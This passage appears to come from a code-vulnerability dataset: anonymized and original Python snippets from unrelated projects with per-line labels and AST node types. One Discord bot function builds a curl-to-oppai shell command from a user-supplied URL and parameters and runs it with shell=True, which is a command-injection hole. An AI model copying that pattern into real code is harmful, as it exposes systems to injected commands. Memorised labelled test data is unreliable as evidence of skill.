"mturk.add_argument('--verbose', dest='verbose', action='store_true', help=\n 'print all messages sent to and from Turkers')\n",
"mturk.add_argument('--hard-block', dest='hard_block', action='store_true',\n default=False, help=\n 'Hard block disconnecting Turkers from all of your HITs')\n",
"mturk.add_argument('--log-level', dest='log_level', type=int, default=20,\n help=\n 'importance level for what to put into the logs. the lower the level the more that gets logged. values are 0-50'\n )\n",
"mturk.add_argument('--block-qualification', dest='block_qualification',\n default='', help=\n 'Qualification to use for soft blocking users. By default turkers are never blocked, though setting this will allow you to filter out turkers that have disconnected too many times on previous HITs where this qualification was set.'\n )\n",
"mturk.add_argument('--count-complete', dest='count_complete', default=False,\n action='store_true', help=\n 'continue until the requested number of conversations are completed rather than attempted'\n )\n",
"mturk.add_argument('--allowed-conversations', dest='allowed_conversations',\n default=0, type=int, help=\n 'number of concurrent conversations that one mturk worker is able to be involved in, 0 is unlimited'\n )\n",
"mturk.add_argument('--max-connections', dest='max_connections', default=30,\n type=int, help=\n 'number of HITs that can be launched at the same time, 0 is unlimited.')\n",
"mturk.add_argument('--min-messages', dest='min_messages', default=0, type=\n int, help=\n 'number of messages required to be sent by MTurk agent when considering whether to approve a HIT in the event of a partner disconnect. I.e. if the number of messages exceeds this number, the turker can submit the HIT.'\n )\n",
"mturk.add_argument('--local', dest='local', default=False, action=\n 'store_true', help=\n 'Run the server locally on this server rather than setting up a heroku server.'\n )\n",
"mturk.set_defaults(is_sandbox=True)\n",
"mturk.set_defaults(is_debug=False)\n",
"mturk.set_defaults(verbose=False)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_28(self):...\n",
"VAR_13 = 1234.567\n",
"self.cursor.execute('create table t1(n float)')\n",
"self.cursor.execute('insert into t1 values (?)', VAR_13)\n",
"VAR_20 = self.cursor.execute('select n from t1').fetchone()[0]\n",
"self.assertEqual(VAR_20, VAR_13)\n"
] | [
"def test_float(self):...\n",
"value = 1234.567\n",
"self.cursor.execute('create table t1(n float)')\n",
"self.cursor.execute('insert into t1 values (?)', value)\n",
"result = self.cursor.execute('select n from t1').fetchone()[0]\n",
"self.assertEqual(result, value)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'"
] |
[
"def FUNC_3(VAR_5):...\n",
"VAR_7 = load_website_config(VAR_5)\n",
"VAR_10 = FUNC_4(VAR_5, VAR_7)\n",
"VAR_12 = IOLoop.instance()\n",
"VAR_12.add_callback(lambda : VAR_0.info('started website {}'.format(VAR_5)))\n",
"start_http_server(VAR_10, VAR_12=io_loop, host=config.host, port=config.port)\n"
] | [
"def start_website(purpose):...\n",
"config = load_website_config(purpose)\n",
"http_handler = create_website_http_handler(purpose, config)\n",
"io_loop = IOLoop.instance()\n",
"io_loop.add_callback(lambda : LOGGER.info('started website {}'.format(purpose))\n )\n",
"start_http_server(http_handler, io_loop=io_loop, host=config.host, port=\n config.port)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_13(self, VAR_10=None, VAR_14=None, VAR_15=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_15:\n",
"VAR_10 = sys.argv[1:] if VAR_10 is None else VAR_10\n",
"return super().parse_known_args(VAR_10, VAR_14)\n",
"VAR_10 = [a for a in VAR_10 if a != '-h' and a != '--help']\n"
] | [
"def parse_known_args(self, args=None, namespace=None, nohelp=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if nohelp:\n",
"args = sys.argv[1:] if args is None else args\n",
"return super().parse_known_args(args, namespace)\n",
"args = [a for a in args if a != '-h' and a != '--help']\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Assign'",
"Return'",
"Assign'"
] |
[
"def FUNC_20(*VAR_17, **VAR_18):...\n",
"VAR_61 = VAR_52(*VAR_17, **kwargs)\n",
"if VAR_27:\n",
"mock.patch.object(VAR_61, '_validate_result').start()\n",
"return VAR_61\n"
] | [
"def _new_client_for(*args, **kwargs):...\n",
"sub_client = new_client_for(*args, **kwargs)\n",
"if mock_validate:\n",
"mock.patch.object(sub_client, '_validate_result').start()\n",
"return sub_client\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Condition",
"Expr'",
"Return'"
] |
[
"def FUNC_7(VAR_10, VAR_11):...\n",
"VAR_10 = VAR_10.replace('/b/', '/osu/').split('&', 1)[0]\n",
"if VAR_11 == '':\n",
"VAR_37 = 'curl ' + VAR_10 + ' | /home/pi/DiscordBots/Oppai/oppai/oppai -'\n",
"VAR_37 = ('curl ' + VAR_10 + ' | /home/pi/DiscordBots/Oppai/oppai/oppai - ' +\n VAR_11)\n",
"VAR_20 = subprocess.Popen(VAR_37, stdout=subprocess.PIPE, stderr=subprocess\n .STDOUT, shell=True)\n",
"VAR_21 = VAR_20.stdout.read()\n",
"VAR_22, VAR_23, VAR_24, VAR_25, VAR_26 = FUNC_8(VAR_21)\n",
"if VAR_22 == -1:\n",
"VAR_22 = VAR_38 = VAR_23 = VAR_24 = VAR_25 = VAR_26 = -1\n",
"VAR_20 = subprocess.Popen(VAR_37 + ' 95%', stdout=subprocess.PIPE, stderr=\n subprocess.STDOUT, shell=True)\n",
"return VAR_22, VAR_38, VAR_23, VAR_24, VAR_25, VAR_26\n",
"VAR_21 = VAR_20.stdout.read()\n",
"VAR_38, VAR_39, VAR_39, VAR_39, VAR_39 = FUNC_8(VAR_21)\n",
"return VAR_22, VAR_38, VAR_23, VAR_24, VAR_25, VAR_26\n"
] | [
"def return_beatmap_infos(url, oppaiParameters):...\n",
"url = url.replace('/b/', '/osu/').split('&', 1)[0]\n",
"if oppaiParameters == '':\n",
"command = 'curl ' + url + ' | /home/pi/DiscordBots/Oppai/oppai/oppai -'\n",
"command = ('curl ' + url + ' | /home/pi/DiscordBots/Oppai/oppai/oppai - ' +\n oppaiParameters)\n",
"p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.\n STDOUT, shell=True)\n",
"raw_data = p.stdout.read()\n",
"pp_100, name, combo, stars, diff_params = get_infos(raw_data)\n",
"if pp_100 == -1:\n",
"pp_100 = pp_95 = name = combo = stars = diff_params = -1\n",
"p = subprocess.Popen(command + ' 95%', stdout=subprocess.PIPE, stderr=\n subprocess.STDOUT, shell=True)\n",
"return pp_100, pp_95, name, combo, stars, diff_params\n",
"raw_data = p.stdout.read()\n",
"pp_95, _, _, _, _ = get_infos(raw_data)\n",
"return pp_100, pp_95, name, combo, stars, diff_params\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Return'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_5():...\n",
"\"\"\"docstring\"\"\"\n",
"FUNC_1('delete from Player')\n"
] | [
"def deletePlayers():...\n",
"\"\"\"docstring\"\"\"\n",
"execute('delete from Player')\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Expr'"
] |
[
"def FUNC_0(self, *VAR_4, **VAR_5):...\n",
"VAR_11 = self.REQUEST\n",
"VAR_12 = VAR_11.RESPONSE\n",
"return self.getBodyContent(VAR_11)\n"
] | [
"def zmi_body_content(self, *args, **kwargs):...\n",
"request = self.REQUEST\n",
"response = request.RESPONSE\n",
"return self.getBodyContent(request)\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_4(self):...\n",
"self.uut.executable = 'more'\n",
"self.uut.use_stdin = True\n",
"self.uut.use_stderr = False\n",
"self.uut.process_output = lambda output, filename, file: output\n",
"VAR_1 = self.uut.lint(file=lines)\n",
"self.assertTrue(('abcd\\n', 'efgh\\n') == VAR_1 or ('abcd\\n', 'efgh\\n', '\\n') ==\n VAR_1)\n"
] | [
"def test_stdin_input(self):...\n",
"self.uut.executable = 'more'\n",
"self.uut.use_stdin = True\n",
"self.uut.use_stderr = False\n",
"self.uut.process_output = lambda output, filename, file: output\n",
"out = self.uut.lint(file=lines)\n",
"self.assertTrue(('abcd\\n', 'efgh\\n') == out or ('abcd\\n', 'efgh\\n', '\\n') ==\n out)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"from __future__ import print_function\n",
"import os\n",
"import threading\n",
"from .__init__ import *\n",
"\"\"\"single level in the virtual fs\"\"\"\n",
"def __init__(self, VAR_0, VAR_1, VAR_2=[], VAR_3=[]):...\n",
"self.realpath = VAR_0\n",
"self.vpath = VAR_1\n",
"self.uread = VAR_2\n",
"self.uwrite = VAR_3\n",
"self.nodes = {}\n",
"def FUNC_0(self, VAR_4, VAR_5):...\n",
"\"\"\"docstring\"\"\"\n",
"assert not VAR_4.endswith('/')\n",
"assert not VAR_5.endswith('/')\n",
"if '/' in VAR_5:\n",
"VAR_34, VAR_5 = VAR_5.split('/', 1)\n",
"if VAR_5 in self.nodes:\n",
"if VAR_34 in self.nodes:\n",
"return self.nodes[VAR_5]\n",
"VAR_20 = '{}/{}'.format(self.vpath, VAR_5).lstrip('/')\n",
"return self.nodes[VAR_34].add(VAR_4, VAR_5)\n",
"VAR_21 = CLASS_0('{}/{}'.format(self.realpath, VAR_34), '{}/{}'.format(self\n .vpath, VAR_34).lstrip('/'), self.uread, self.uwrite)\n",
"VAR_21 = CLASS_0(VAR_4, VAR_20)\n",
"self.nodes[VAR_34] = VAR_21\n",
"self.nodes[VAR_5] = VAR_21\n",
"return VAR_21.add(VAR_4, VAR_5)\n",
"return VAR_21\n"
] | [
"from __future__ import print_function\n",
"import os\n",
"import threading\n",
"from .__init__ import *\n",
"\"\"\"single level in the virtual fs\"\"\"\n",
"def __init__(self, realpath, vpath, uread=[], uwrite=[]):...\n",
"self.realpath = realpath\n",
"self.vpath = vpath\n",
"self.uread = uread\n",
"self.uwrite = uwrite\n",
"self.nodes = {}\n",
"def add(self, src, dst):...\n",
"\"\"\"docstring\"\"\"\n",
"assert not src.endswith('/')\n",
"assert not dst.endswith('/')\n",
"if '/' in dst:\n",
"name, dst = dst.split('/', 1)\n",
"if dst in self.nodes:\n",
"if name in self.nodes:\n",
"return self.nodes[dst]\n",
"vp = '{}/{}'.format(self.vpath, dst).lstrip('/')\n",
"return self.nodes[name].add(src, dst)\n",
"vn = VFS('{}/{}'.format(self.realpath, name), '{}/{}'.format(self.vpath,\n name).lstrip('/'), self.uread, self.uwrite)\n",
"vn = VFS(src, vp)\n",
"self.nodes[name] = vn\n",
"self.nodes[dst] = vn\n",
"return vn.add(src, dst)\n",
"return vn\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"Import'",
"ImportFrom'",
"Expr'",
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Docstring",
"Assert'",
"Assert'",
"Condition",
"Assign'",
"Condition",
"Condition",
"Return'",
"Assign'",
"Return'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'",
"Return'"
] |
[
"def FUNC_25(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return any(self.live_processes())\n"
] | [
"def any_processes_alive(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return any(self.live_processes())\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_8(self, VAR_18, VAR_6, VAR_4, VAR_19):...\n",
"if 'internet_nl_api_password' in VAR_4.changed_data:\n",
"VAR_26 = Fernet(settings.FIELD_ENCRYPTION_KEY)\n",
"super().save_model(VAR_18, VAR_6, VAR_4, VAR_19)\n",
"VAR_27 = VAR_26.encrypt(VAR_6.internet_nl_api_password.encode())\n",
"VAR_6.internet_nl_api_password = VAR_27\n"
] | [
"def save_model(self, request, obj, form, change):...\n",
"if 'internet_nl_api_password' in form.changed_data:\n",
"f = Fernet(settings.FIELD_ENCRYPTION_KEY)\n",
"super().save_model(request, obj, form, change)\n",
"encrypted = f.encrypt(obj.internet_nl_api_password.encode())\n",
"obj.internet_nl_api_password = encrypted\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Expr'",
"Assign'",
"Assign'"
] |
[
"def FUNC_1(VAR_5, **VAR_6):...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_7(VAR_17):...\n",
"@receiver(VAR_5, **decorator_kwargs)...\n",
"if settings.SUSPEND_SIGNALS:\n",
"return\n",
"return VAR_17(VAR_23, **kwargs)\n"
] | [
"def suspending_receiver(signal, **decorator_kwargs):...\n",
"\"\"\"docstring\"\"\"\n",
"def our_wrapper(func):...\n",
"@receiver(signal, **decorator_kwargs)...\n",
"if settings.SUSPEND_SIGNALS:\n",
"return\n",
"return func(sender, **kwargs)\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"FunctionDef'",
"Condition",
"Condition",
"Return'",
"Return'"
] |
[
"from __future__ import absolute_import, division, print_function, unicode_literals\n",
"import os\n",
"import sys\n",
"from builtins import filter, object\n",
"from collections import defaultdict\n",
"from contextlib import contextmanager\n",
"from twitter.common.collections import OrderedSet\n",
"from pants.base.build_environment import get_buildroot, get_scm\n",
"from pants.base.worker_pool import SubprocPool\n",
"from pants.base.workunit import WorkUnit, WorkUnitLabel\n",
"from pants.build_graph.target import Target\n",
"from pants.engine.isolated_process import FallibleExecuteProcessResult\n",
"from pants.goal.products import Products\n",
"from pants.goal.workspace import ScmWorkspace\n",
"from pants.process.lock import OwnerPrintingInterProcessFileLock\n",
"from pants.reporting.report import Report\n",
"from pants.source.source_root import SourceRootConfig\n",
"\"\"\"string\"\"\"\n",
"\"\"\"A logger facade that logs into the pants reporting framework.\"\"\"\n",
"def __init__(self, VAR_1):...\n",
"self._run_tracker = VAR_1\n",
"def FUNC_27(self, *VAR_33):...\n",
"self._run_tracker.log(Report.DEBUG, *VAR_33)\n",
"def FUNC_28(self, *VAR_33):...\n",
"self._run_tracker.log(Report.INFO, *VAR_33)\n",
"def FUNC_29(self, *VAR_33):...\n",
"self._run_tracker.log(Report.WARN, *VAR_33)\n",
"def FUNC_30(self, *VAR_33):...\n",
"self._run_tracker.log(Report.ERROR, *VAR_33)\n",
"def FUNC_31(self, *VAR_33):...\n",
"self._run_tracker.log(Report.FATAL, *VAR_33)\n",
"def __init__(self, VAR_0, VAR_1, VAR_2, VAR_3=None, VAR_4=None, VAR_5=None,...\n",
"self._options = VAR_0\n",
"self.build_graph = VAR_5\n",
"self.build_file_parser = VAR_6\n",
"self.address_mapper = VAR_7\n",
"self.run_tracker = VAR_1\n",
"self._log = self.Log(VAR_1)\n",
"self._target_base = VAR_4 or Target\n",
"self._products = Products()\n",
"self._buildroot = get_buildroot()\n",
"self._source_roots = SourceRootConfig.global_instance().get_source_roots()\n",
"self._lock = OwnerPrintingInterProcessFileLock(os.path.join(self._buildroot,\n '.pants.workdir.file_lock'))\n",
"self._java_sysprops = None\n",
"self.requested_goals = VAR_3 or []\n",
"self._console_outstream = VAR_8 or sys.stdout\n",
"self._scm = VAR_9 or get_scm()\n",
"self._workspace = VAR_10 or (ScmWorkspace(self._scm) if self._scm else None)\n",
"self._replace_targets(VAR_2)\n",
"self._invalidation_report = VAR_11\n",
"self._scheduler = VAR_12\n",
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._options\n"
] | [
"from __future__ import absolute_import, division, print_function, unicode_literals\n",
"import os\n",
"import sys\n",
"from builtins import filter, object\n",
"from collections import defaultdict\n",
"from contextlib import contextmanager\n",
"from twitter.common.collections import OrderedSet\n",
"from pants.base.build_environment import get_buildroot, get_scm\n",
"from pants.base.worker_pool import SubprocPool\n",
"from pants.base.workunit import WorkUnit, WorkUnitLabel\n",
"from pants.build_graph.target import Target\n",
"from pants.engine.isolated_process import FallibleExecuteProcessResult\n",
"from pants.goal.products import Products\n",
"from pants.goal.workspace import ScmWorkspace\n",
"from pants.process.lock import OwnerPrintingInterProcessFileLock\n",
"from pants.reporting.report import Report\n",
"from pants.source.source_root import SourceRootConfig\n",
"\"\"\"Contains the context for a single run of pants.\n\n Task implementations can access configuration data from pants.ini and any flags they have exposed\n here as well as information about the targets involved in the run.\n\n Advanced uses of the context include adding new targets to it for upstream or downstream goals to\n operate on and mapping of products a goal creates to the targets the products are associated with.\n\n :API: public\n \"\"\"\n",
"\"\"\"A logger facade that logs into the pants reporting framework.\"\"\"\n",
"def __init__(self, run_tracker):...\n",
"self._run_tracker = run_tracker\n",
"def debug(self, *msg_elements):...\n",
"self._run_tracker.log(Report.DEBUG, *msg_elements)\n",
"def info(self, *msg_elements):...\n",
"self._run_tracker.log(Report.INFO, *msg_elements)\n",
"def warn(self, *msg_elements):...\n",
"self._run_tracker.log(Report.WARN, *msg_elements)\n",
"def error(self, *msg_elements):...\n",
"self._run_tracker.log(Report.ERROR, *msg_elements)\n",
"def fatal(self, *msg_elements):...\n",
"self._run_tracker.log(Report.FATAL, *msg_elements)\n",
"def __init__(self, options, run_tracker, target_roots, requested_goals=None,...\n",
"self._options = options\n",
"self.build_graph = build_graph\n",
"self.build_file_parser = build_file_parser\n",
"self.address_mapper = address_mapper\n",
"self.run_tracker = run_tracker\n",
"self._log = self.Log(run_tracker)\n",
"self._target_base = target_base or Target\n",
"self._products = Products()\n",
"self._buildroot = get_buildroot()\n",
"self._source_roots = SourceRootConfig.global_instance().get_source_roots()\n",
"self._lock = OwnerPrintingInterProcessFileLock(os.path.join(self._buildroot,\n '.pants.workdir.file_lock'))\n",
"self._java_sysprops = None\n",
"self.requested_goals = requested_goals or []\n",
"self._console_outstream = console_outstream or sys.stdout\n",
"self._scm = scm or get_scm()\n",
"self._workspace = workspace or (ScmWorkspace(self._scm) if self._scm else None)\n",
"self._replace_targets(target_roots)\n",
"self._invalidation_report = invalidation_report\n",
"self._scheduler = scheduler\n",
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._options\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Docstring",
"Return'"
] |
[
"@classmethod...\n",
"return [FUNC_29, FUNC_30]\n"
] | [
"@classmethod...\n",
"return [failing, skipped]\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_5(self, VAR_19: UserDTO):...\n",
"\"\"\"docstring\"\"\"\n",
"self.email_address = VAR_19.email_address.lower(\n ) if VAR_19.email_address else None\n",
"self.twitter_id = VAR_19.twitter_id.lower() if VAR_19.twitter_id else None\n",
"self.facebook_id = VAR_19.facebook_id.lower() if VAR_19.facebook_id else None\n",
"self.linkedin_id = VAR_19.linkedin_id.lower() if VAR_19.linkedin_id else None\n",
"self.validation_message = VAR_19.validation_message\n",
"db.session.commit()\n"
] | [
"def update(self, user_dto: UserDTO):...\n",
"\"\"\"docstring\"\"\"\n",
"self.email_address = user_dto.email_address.lower(\n ) if user_dto.email_address else None\n",
"self.twitter_id = user_dto.twitter_id.lower() if user_dto.twitter_id else None\n",
"self.facebook_id = user_dto.facebook_id.lower(\n ) if user_dto.facebook_id else None\n",
"self.linkedin_id = user_dto.linkedin_id.lower(\n ) if user_dto.linkedin_id else None\n",
"self.validation_message = user_dto.validation_message\n",
"db.session.commit()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_14(self, VAR_7):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
"def _get_proxied_attribute_value(self, attribute):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
0,
0
] | [
"FunctionDef'",
"Docstring"
] |
[
"def FUNC_2(VAR_2):...\n",
"return render(VAR_2, 'etd_app/home.html')\n"
] | [
"def home(request):...\n",
"return render(request, 'etd_app/home.html')\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"from google.appengine.api import users as gae_users\n",
"from components import auth\n",
"from components import config as config_api\n",
"from components import decorators\n",
"from components import endpoints_webapp2\n",
"from components import prpc\n",
"import webapp2\n",
"from legacy import api as legacy_api\n",
"from legacy import swarmbucket_api\n",
"import access\n",
"import api\n",
"import bq\n",
"import bulkproc\n",
"import config\n",
"import expiration\n",
"import model\n",
"import notifications\n",
"import service\n",
"import swarming\n",
"import user\n",
"VAR_0 = (\n 'https://chromium.googlesource.com/infra/infra/+/master/appengine/cr-buildbucket/README.md'\n )\n",
"\"\"\"Redirects to README.md.\"\"\"\n",
"def FUNC_2(self):...\n",
"return self.redirect(VAR_0)\n"
] | [
"from google.appengine.api import users as gae_users\n",
"from components import auth\n",
"from components import config as config_api\n",
"from components import decorators\n",
"from components import endpoints_webapp2\n",
"from components import prpc\n",
"import webapp2\n",
"from legacy import api as legacy_api\n",
"from legacy import swarmbucket_api\n",
"import access\n",
"import api\n",
"import bq\n",
"import bulkproc\n",
"import config\n",
"import expiration\n",
"import model\n",
"import notifications\n",
"import service\n",
"import swarming\n",
"import user\n",
"README_MD = (\n 'https://chromium.googlesource.com/infra/infra/+/master/appengine/cr-buildbucket/README.md'\n )\n",
"\"\"\"Redirects to README.md.\"\"\"\n",
"def get(self):...\n",
"return self.redirect(README_MD)\n"
] | [
3,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Assign'",
"Expr'",
"FunctionDef'",
"Return'"
] |
[
"def FUNC_27(self, VAR_75):...\n",
"def FUNC_39(VAR_101):...\n",
"VAR_101.threads = VAR_75\n",
"return VAR_101\n"
] | [
"def threads(self, threads):...\n",
"def decorate(ruleinfo):...\n",
"ruleinfo.threads = threads\n",
"return ruleinfo\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"from m5.params import *\n",
"from m5.proxy import *\n",
"from m5.util.fdthelper import *\n",
"from m5.SimObject import SimObject\n",
"from m5.objects.Device import PioDevice\n",
"from m5.objects.Platform import Platform\n",
"VAR_0 = 'BaseGic'\n",
"VAR_1 = True\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_3 = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"VAR_4 = Param.UInt32(0, 'Distributor Implementer Identification Register')\n",
"VAR_5 = Param.UInt32(0, 'Peripheral Identification Register')\n",
"VAR_6 = Param.UInt32(0, 'CPU Interface Identification Register')\n",
"VAR_7 = Param.UInt32(0, 'VM CPU Interface Identification Register')\n",
"VAR_0 = 'ArmInterruptPin'\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_8 = 'ArmInterruptPinGen'\n",
"VAR_1 = True\n",
"VAR_3 = Param.Platform(Parent.any, 'Platform with interrupt controller')\n",
"VAR_9 = Param.UInt32('Interrupt number in GIC')\n",
"VAR_0 = 'ArmSPI'\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_8 = 'ArmSPIGen'\n",
"VAR_0 = 'ArmPPI'\n",
"VAR_2 = 'dev/arm/base_gic.hh'\n",
"VAR_8 = 'ArmPPIGen'\n",
"VAR_0 = 'GicV2'\n",
"VAR_2 = 'dev/arm/gic_v2.hh'\n",
"VAR_10 = Param.Addr('Address for distributor')\n",
"VAR_11 = Param.Addr('Address for cpu')\n",
"VAR_12 = Param.Addr(8192, 'Size of cpu register bank')\n",
"VAR_13 = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"VAR_14 = Param.Latency('10ns', 'Delay for PIO r/w to cpu interface')\n",
"VAR_15 = Param.Latency('10ns', 'Delay for interrupt to get to CPU')\n",
"VAR_16 = Param.UInt32(128, 'Number of interrupt lines supported (max = 1020)')\n",
"VAR_17 = Param.Bool(False, 'Enable gem5 extensions')\n",
"\"\"\"string\"\"\"\n",
"VAR_5 = 2864272\n",
"VAR_4 = 33559611\n",
"VAR_6 = 33690683\n",
"VAR_7 = VAR_6\n",
"VAR_0 = 'Gicv2mFrame'\n",
"VAR_2 = 'dev/arm/gic_v2m.hh'\n",
"VAR_18 = Param.UInt32(0, 'Frame SPI base number')\n",
"VAR_19 = Param.UInt32(0, 'Frame SPI total number')\n",
"VAR_20 = Param.Addr('Address for frame PIO')\n",
"VAR_0 = 'Gicv2m'\n",
"VAR_2 = 'dev/arm/gic_v2m.hh'\n",
"VAR_21 = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"VAR_22 = Param.BaseGic(Parent.any, 'Gic on which to trigger interrupts')\n",
"VAR_23 = VectorParam.Gicv2mFrame([], 'Power of two number of frames')\n",
"VAR_0 = 'VGic'\n",
"VAR_2 = 'dev/arm/vgic.hh'\n",
"VAR_22 = Param.BaseGic(Parent.any, 'Gic to use for interrupting')\n",
"VAR_3 = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"VAR_24 = Param.Addr(0, 'Address for vcpu interfaces')\n",
"VAR_25 = Param.Addr(0, 'Address for hv control')\n",
"VAR_21 = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"VAR_26 = Param.UInt32('HV maintenance interrupt number')\n",
"VAR_7 = Param.UInt32(Self.gic.gicc_iidr,\n 'VM CPU Interface Identification Register')\n",
"def FUNC_0(self, VAR_27):...\n",
"VAR_22 = self.gic.unproxy(self)\n",
"VAR_32 = FdtNode('interrupt-controller')\n",
"VAR_32.appendCompatible(['gem5,gic', 'arm,cortex-a15-gic', 'arm,cortex-a9-gic']\n )\n",
"VAR_32.append(FdtPropertyWords('#interrupt-cells', [3]))\n",
"VAR_32.append(FdtPropertyWords('#address-cells', [0]))\n",
"VAR_32.append(FdtProperty('interrupt-controller'))\n",
"VAR_33 = VAR_27.addrCells(VAR_22.dist_addr) + VAR_27.sizeCells(4096\n ) + VAR_27.addrCells(VAR_22.cpu_addr) + VAR_27.sizeCells(4096\n ) + VAR_27.addrCells(self.hv_addr) + VAR_27.sizeCells(8192\n ) + VAR_27.addrCells(self.vcpu_addr) + VAR_27.sizeCells(8192)\n",
"VAR_32.append(FdtPropertyWords('reg', VAR_33))\n",
"VAR_32.append(FdtPropertyWords('interrupts', [1, int(self.maint_int) - 16, \n 3844]))\n",
"VAR_32.appendPhandle(VAR_22)\n",
"yield VAR_32\n",
"VAR_0 = 'Gicv3'\n",
"VAR_2 = 'dev/arm/gic_v3.hh'\n",
"VAR_10 = Param.Addr('Address for distributor')\n",
"VAR_13 = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"VAR_28 = Param.Addr('Address for redistributors')\n",
"VAR_29 = Param.Latency('10ns', 'Delay for PIO r/w to redistributors')\n",
"VAR_16 = Param.UInt32(1020, 'Number of interrupt lines supported (max = 1020)')\n",
"VAR_26 = Param.ArmInterruptPin('string')\n",
"VAR_30 = Param.Unsigned(256,\n 'Maximum number of PE. This is affecting the maximum number of redistributors'\n )\n",
"VAR_31 = Param.Bool(True, 'GICv4 extension available')\n"
] | [
"from m5.params import *\n",
"from m5.proxy import *\n",
"from m5.util.fdthelper import *\n",
"from m5.SimObject import SimObject\n",
"from m5.objects.Device import PioDevice\n",
"from m5.objects.Platform import Platform\n",
"type = 'BaseGic'\n",
"abstract = True\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"platform = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"gicd_iidr = Param.UInt32(0, 'Distributor Implementer Identification Register')\n",
